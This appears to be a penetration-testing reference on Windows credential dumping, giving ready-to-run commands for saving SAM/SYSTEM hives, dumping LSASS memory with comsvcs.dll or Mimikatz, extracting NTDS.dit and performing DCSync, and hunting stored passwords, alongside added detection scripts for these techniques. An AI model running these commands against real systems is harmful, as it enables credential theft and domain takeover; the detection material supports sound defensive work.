# Credential Dumping
Extracting credentials from Windows systems involves three main targets: the SAM database (local accounts), LSASS process memory (active sessions), and NTDS.dit (all domain accounts). Each requires admin or SYSTEM context.
## AD Concepts Primer

| Term | Description |
|---|---|
| DC | Domain Controller: runs AD DS, authenticates users, stores NTDS.dit |
| NTLM Hash | MD4(UTF-16LE(password)): used for authentication and offline cracking |
| TGT | Ticket Granting Ticket: encrypted with krbtgt hash, proves identity to the KDC |
| TGS | Ticket Granting Service: service ticket encrypted with the service account's hash |
| SPN | Service Principal Name: attribute linking an account to a Kerberos service |
| NTDS.dit | AD database on every DC: contains hashes for all domain accounts |
| SAM | Security Account Manager: local account database, only contains local users |
| LSASS | Local Security Authority Subsystem Service: holds plaintext creds and hashes in memory |
| AS-REP | Authentication Service Response: returned by KDC in step 1 of Kerberos auth |
| DCC2 | Domain Cached Credentials v2 (MS-CACHE2): stored locally when DC is unreachable |
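The NTLM hash definition from the table, as an added example that is not part of the original page: a from-scratch MD4 (so it runs where OpenSSL's legacy md4 is disabled), plus a defender-side audit that flags empty and reused NT hashes in secretsdump-style output. The dump lines are constructed sample data.

```python
import struct

def _md4(msg: bytes) -> bytes:
    """Minimal MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    bit_len = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = [(i % 4) * 4 + i // 4 for i in range(16)]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl((a + G(b, c, d) + X[r2[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rotl((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)): unsalted, so equal passwords give equal hashes."""
    return _md4(password.encode("utf-16-le")).hex()

EMPTY_NT = nt_hash("")  # the hash of an empty password: 31d6cfe0d16ae931b73c59d7e0c089c0

def audit_dump(lines):
    """Hygiene check over 'user:rid:lmhash:nthash:::' lines as secretsdump prints them.
    Returns (accounts with an empty password, {nthash: [accounts sharing it]})."""
    by_hash = {}
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) >= 4:
            by_hash.setdefault(parts[3].lower(), []).append(parts[0])
    empty = by_hash.get(EMPTY_NT, [])
    shared = {h: u for h, u in by_hash.items() if len(u) > 1 and h != EMPTY_NT}
    return empty, shared

SAMPLE = [  # constructed sample output; the LM field is the well-known empty-LM value
    f"Administrator:500:aad3b435b51404eeaad3b435b51404ee:{nt_hash('password')}:::",
    f"svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:{nt_hash('password')}:::",
    f"Guest:501:aad3b435b51404eeaad3b435b51404ee:{EMPTY_NT}:::",
]
```

Shared hashes across accounts mean password reuse; an empty hash on an enabled account is a finding on its own.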
## SAM Database

The SAM database stores local account hashes. Reading it requires SYSTEM context. Save both the SAM and SYSTEM hives: the SYSTEM hive holds the boot key needed to decrypt the SAM. The SECURITY hive additionally holds LSA secrets and cached domain credentials (DCC2).

```
# Save hives (requires admin → SYSTEM via token impersonation)
reg save HKLM\SAM C:\Temp\sam.bak
reg save HKLM\SYSTEM C:\Temp\system.bak
reg save HKLM\SECURITY C:\Temp\security.bak

# Offline dump on Linux
secretsdump.py -sam sam.bak -system system.bak LOCAL

# Remote: directly against target
secretsdump.py domain/user:pass@<ip>
secretsdump.py domain/user@<ip> -hashes :<NThash>

# nxc: dumps SAM remotely
nxc smb <ip> -u user -p pass --sam
nxc smb <ip> -u user -H <NThash> --sam
```
## LSASS Dump

LSASS caches credentials for active sessions: NTLM hashes, Kerberos tickets, and sometimes plaintext passwords (WDigest, only when the UseLogonCredential setting is enabled; it is off by default since Windows 8.1 / Server 2012 R2). Requires SYSTEM or SeDebugPrivilege.

```
# Task Manager (GUI): least suspicious
# Task Manager → Details tab → right-click lsass.exe → Create dump file
# File lands in C:\Users\<user>\AppData\Local\Temp\lsass.DMP

# comsvcs.dll: pure LOLBin, no additional tooling
$pid = (Get-Process lsass).Id
rundll32 C:\Windows\System32\comsvcs.dll MiniDump $pid C:\Windows\Temp\lsass.dmp full

# Mimikatz: interactive dump on target
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::tickets /export

# Parse dump offline on Linux
pypykatz lsa minidump lsass.dmp
pypykatz lsa minidump lsass.dmp -o output.json
```
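Detection for the three dump paths above, as an added example that is not part of the original page: it scans Sysmon events (ProcessAccess 10, ProcessCreate 1, FileCreate 11) supplied as dicts of EventData fields. The allowlist of legitimate lsass readers and the sample events are constructed assumptions to tune per estate.

```python
import re

PROCESS_VM_READ = 0x0010  # any memory dump of lsass needs this right in GrantedAccess
# Assumption (placeholder): processes that legitimately open lsass here; tune to your baseline
ALLOWED_LSASS_READERS = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
DUMP_CMD = re.compile(r"comsvcs\.dll.*minidump", re.I)   # rundll32 comsvcs.dll MiniDump
DUMP_FILE = re.compile(r"\\lsass[^\\]*\.dmp$", re.I)     # Task Manager / tooling output file

def check_event(ev: dict):
    """Return a finding string for one Sysmon event (EventID plus EventData fields), or None."""
    eid = ev.get("EventID")
    if eid == 10:  # ProcessAccess
        if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            return None
        src = ev.get("SourceImage", "").lower()
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        if src in ALLOWED_LSASS_READERS or not access & PROCESS_VM_READ:
            return None
        return f"EID10 lsass memory read by {src} (GrantedAccess={access:#x})"
    if eid == 1 and DUMP_CMD.search(ev.get("CommandLine", "")):  # ProcessCreate
        return f"EID1 comsvcs MiniDump: {ev['CommandLine']}"
    if eid == 11 and DUMP_FILE.search(ev.get("TargetFilename", "")):  # FileCreate
        return f"EID11 lsass dump written by {ev.get('Image')}: {ev['TargetFilename']}"
    return None

def scan(events):
    return [f for f in map(check_event, events) if f]

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\Windows\System32\comsvcs.dll MiniDump 712 C:\Windows\Temp\lsass.dmp full"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",    # allowlisted reader
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",  # query only, no VM_READ
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
]
```

Mimikatz run interactively leaves no command line to match, which is why the ProcessAccess rule keys on GrantedAccess rather than on a tool name.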
## NTDS.dit

The domain database holding hashes for every domain account. It exists only on DCs: extracting it needs admin rights on a DC or, for DCSync, the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object.

```
# ntdsutil IFM: official Windows tool, quiet
ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\IFM" quit quit

# VSS shadow copy: bypasses file locks
vssadmin create shadow /for=C:
# Note the shadow copy device path (e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM
vssadmin delete shadows /shadow=<ShadowID> /quiet

# Parse offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -just-dc-user administrator

# DCSync: simulates replication, doesn't touch the NTDS.dit file
secretsdump.py domain/user:pass@<dc-ip>
secretsdump.py domain/user:pass@<dc-ip> -just-dc-user krbtgt
secretsdump.py domain/user:pass@<dc-ip> -just-dc   # all hashes

# nxc
nxc smb <dc-ip> -u user -p pass --ntds
```
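Detection for the DC-side techniques above, added here and not from the original page: a 4662 whose Properties carry the replication control-access rights from a non-DC principal is the DCSync signature, and 4688 command lines catch the ntdsutil IFM and shadow-copy steps. The event dicts are constructed, and treating trailing-`$` machine accounts as expected replicators is an assumption.

```python
import re

# Control-access right GUIDs that DCSync exercises (well-known AD extended rights)
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Matches the ntdsutil IFM and shadow-copy steps shown above
NTDS_CMD = re.compile(r"ntdsutil.*\bifm\b|vssadmin\s+create\s+shadow|HarddiskVolumeShadowCopy\d+\\Windows\\NTDS", re.I)

def is_dc_account(name: str) -> bool:
    """Assumption: replication requests from DC machine accounts (trailing $) are expected."""
    return name.endswith("$")

def check_4662(ev: dict):
    props = ev.get("Properties", "").lower()
    used = [n for g, n in REPL_RIGHTS.items() if g in props]
    if not used or is_dc_account(ev.get("SubjectUserName", "")):
        return None
    return f"possible DCSync: {ev['SubjectUserName']} used {', '.join(used)}"

def check_4688(ev: dict):
    cmd = ev.get("CommandLine", "")
    return f"NTDS extraction by {ev.get('SubjectUserName')}: {cmd}" if NTDS_CMD.search(cmd) else None

def scan_dc_events(events):
    checks = {4662: check_4662, 4688: check_4688}
    findings = []
    for ev in events:
        check = checks.get(ev.get("EventID"))
        if check and (f := check(ev)):
            findings.append(f)
    return findings

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4688, "SubjectUserName": "jdoe",
     "CommandLine": 'ntdsutil "activate instance ntds" "ifm" "create full C:\\Temp\\IFM" quit quit'},
    {"EventID": 4688, "SubjectUserName": "jdoe", "CommandLine": "notepad.exe"},
]
```

Auditing 4662 requires the Directory Service Access subcategory and a SACL on the domain object; without both, DCSync leaves nothing for this rule to see.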
## Credential Hunting in Files

Credentials left in config files, scripts, and the registry are common on real engagements, so they are worth sweeping for before reaching for heavier tooling.

```
# Broad sweep for the "password" keyword
findstr /si password *.txt *.xml *.ini *.config *.ps1 *.bat

# Unattend.xml: sysprep leftover, often contains a plaintext or base64 admin password
Get-ChildItem -Path C:\ -Include Unattend.xml,sysprep.xml,sysprep.inf -Recurse -ErrorAction SilentlyContinue
# Common Unattend locations
# C:\Windows\Panther\Unattend.xml
# C:\Windows\Panther\Unattend\Unattend.xml
# C:\Windows\sysprep\sysprep.xml

# web.config: IIS app credentials
Get-ChildItem -Path C:\inetpub -Include web.config -Recurse -ErrorAction SilentlyContinue | Select-String password

# GPP cPassword: Group Policy Preferences (SYSVOL, pre-MS14-025)
Get-ChildItem -Path "\\<DC>\SYSVOL" -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml -ErrorAction SilentlyContinue |
    Select-String "cpassword"
# Decrypt GPP cPassword on Linux (the AES key is publicly documented)
gpp-decrypt <cpassword_value>

# Registry autologon: plaintext credentials stored for automatic login
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for: DefaultPassword, DefaultUsername, DefaultDomainName

# PowerShell command history
Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# Windows Credential Manager
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"
```
## Hashcat Quick Reference

| Hash Type | Hashcat Mode |
|---|---|
| NTLM | 1000 |
| DCC2 / MS-CACHE2 | 2100 |
| NetNTLMv1 | 5500 |
| NetNTLMv2 | 5600 |
| Kerberoast RC4 (etype 23) | 13100 |
| Kerberoast AES256 (etype 18) | 19700 |
| AS-REP Roast (etype 23) | 18200 |
| JWT | 16500 |